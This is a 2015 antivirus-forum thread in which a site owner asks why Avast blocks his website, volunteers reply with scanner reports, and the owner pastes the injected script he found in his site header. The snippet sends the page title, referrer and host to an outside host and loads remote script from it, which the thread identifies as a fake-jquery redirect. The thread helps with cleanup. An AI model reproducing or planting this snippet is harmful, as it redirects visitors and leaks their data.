Avast WEBforum

Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: REDACTED on December 09, 2015, 10:37:14 AM

Title: i can not ente rto my website
Post by: REDACTED on December 09, 2015, 10:37:14 AM

I have tried to enter my website

Avast blocked my website and i couldnt enter.

i checked some and i couldnt see any problem.

What can be the problem?

mywebsite is ermenek.com


ı have checked on differetn websites.
these were showing safe.
https://safeweb.norton.com/report/show?url=www.ermenek.com
http://scanurl.net/?u=www.ermenek.com&uesb=Check+This+URL#results


but only
https://sitecheck.sucuri.net/results/www.ermenek.com
shows has problem and i couldt find that file.

here also same.
http://quttera.com/detailed_report/www.ermenek.com
ı go the mentioned file  even js file. i cn not see anything.

Title: Re: i can not ente rto my website
Post by: Eddy on December 09, 2015, 10:49:07 AM

Suspicious :
https://www.virustotal.com/en/url/1e83fef4634977e654d03f33ea3d2275eead787bef378abe2e83edd6ec5f86af/analysis/1449654675/

Javascript problems/infections :
http://www.web-malware-removal.com/website-malware-virus-scanner/?url=www.ermenek.com
https://sitecheck.sucuri.net/results/www.ermenek.com
http://retire.insecurity.today/#!/scan/d0f9d8ea4d973e7b61c1887573b6cf63e5b90a75f16a79a3a01966c89e03bb35
http://quttera.com/detailed_report/www.ermenek.com

Blacklisted IP :
http://urlquery.net/report.php?id=1449654040586
http://urlquery.net/report.php?id=1449654273010
http://multirbl.valli.org/lookup/192.186.238.135.html

Security issues :
https://www.ssllabs.com/ssltest/analyze.html?d=ermenek.com

Title: Re: i can not ente rto my website
Post by: Pondus on December 09, 2015, 11:19:18 AM

only avast detect
https://www.virustotal.com/en/file/f391af3c0249e4e650e609808ad8d1c44684f81b9c9c141bdf3bebcbab4f33bf/analysis/1449656292/

Title: Re: i can not ente rto my website
Post by: REDACTED on December 09, 2015, 11:33:18 AM

I found this on my header

<script>var a='';  _proxy_jslib_handle(null, 'setTimeout', setTimeout, 1, 0)(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent( _proxy_jslib_handle(document, 'referrer', '', 0, 0)); var host = encodeURIComponent( _proxy_jslib_handle( _proxy_jslib_handle(window, 'location', '', 0, 0), 'host', '', 0, 0)); var base = "http://vkza.tora.ru/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" +  _proxy_jslib_handle(null, 'host', host, 0, 0); var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){ _proxy_jslib_handle(document, 'write', '', 1, 0)('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');} ;
_proxy_jslib_flush_write_buffers() ;</script>

removing this solve sthe problem or not?

Title: Re: i can not ente rto my website
Post by: Eddy on December 09, 2015, 11:34:24 AM

That is just one file Pondus. ;)

Salimbarsar,
if you can't fixed the issues yourself, hire someone to do it for you.

Title: Re: i can not ente rto my website
Post by: Pondus on December 09, 2015, 11:45:54 AM

Quote

if you can't fixed the issues yourself, hire someone to do it for you.

Sucuri will do it for you, but it is not free  https://sucuri.net/

Title: Re: i can not ente rto my website
Post by: Pondus on December 09, 2015, 05:40:05 PM

Message from F-Secure lab

===================================================================================================
Thank you for your submission.
The site previously infected with a javascript that will inject a fake jquery to redirect user. However, the site is now cleaned. No detection needed. Thank you.
====================================================================================================

Title: Re: i can not ente rto my website
Post by: HonzaZ on December 09, 2015, 06:21:02 PM

Yup, JS:Infection-A detects precisely what salimbasar pasted. Now Avast doesn't complain, so most likely the infection is not there any more (or I am not "lucky" enough to invoke it).

Title: Re: i can not ente rto my website
Post by: Pondus on December 09, 2015, 06:29:11 PM

Detection is now gone from Sucuri also  https://sitecheck.sucuri.net/results/www.ermenek.com